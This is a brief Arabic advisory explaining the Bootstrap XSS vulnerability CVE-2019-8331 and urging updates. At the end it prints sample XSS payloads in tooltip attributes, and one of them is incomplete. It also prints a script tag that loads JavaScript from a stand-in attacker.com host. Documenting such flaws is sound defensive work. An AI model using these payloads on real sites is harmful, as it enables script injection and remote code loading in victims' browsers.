
ثغرة CVE-2019-8331
CVE-2019-8331 هو ثغرة أمنية من نوع Cross-Site Scripting (XSS) موجودة في Bootstrap، وهي مكتبة JavaScript تُستخدم على نطاق واسع في تطوير مواقع الويب وتطبيقات الهاتف المحمول. تحدث هذه الثغرة لأن Bootstrap لا يقوم بتصفية البيانات المرسلة عبر خاصية data-template لعنصر tooltip أو popover بشكل صحيح، مما يسمح للمهاجم بحقن كود خبيث في صفحة الويب.
يمكن أن يحدث هذا الهجوم إذا تمكن المهاجم من التحكم في البيانات التي سيتم عرضها كـ tooltip أو popover. عند قيام المستخدم بتفعيل tooltip أو popover، يتم حقن الكود الخبيث في صفحة الويب وقد يتم تنفيذه بواسطة متصفح المستخدم.
تم إصلاح هذه الثغرة في Bootstrap الإصدار 4.3.1 و 5.0.0-beta2. يجب على المسؤولين تحديث إصدارات Bootstrap المتأثرة لمعالجة هذه الثغرة.
تفاصيل إضافية حول ثغرة CVE-2019-8331:
<x data-toggle="tooltip" data-template="">XSS</x>
<x data-toggle="tooltip" data-html="true" title='<script>alert(1)</script>'>XSS</x>
<x data-toggle="tooltip" data-html="true" data-content='<script>alert(1)</script>'>XSS</x>
<script>
var script = document.createElement("script");
script.src = "https://attacker.com/malicious.js";
document.body.appendChild(script);
</script>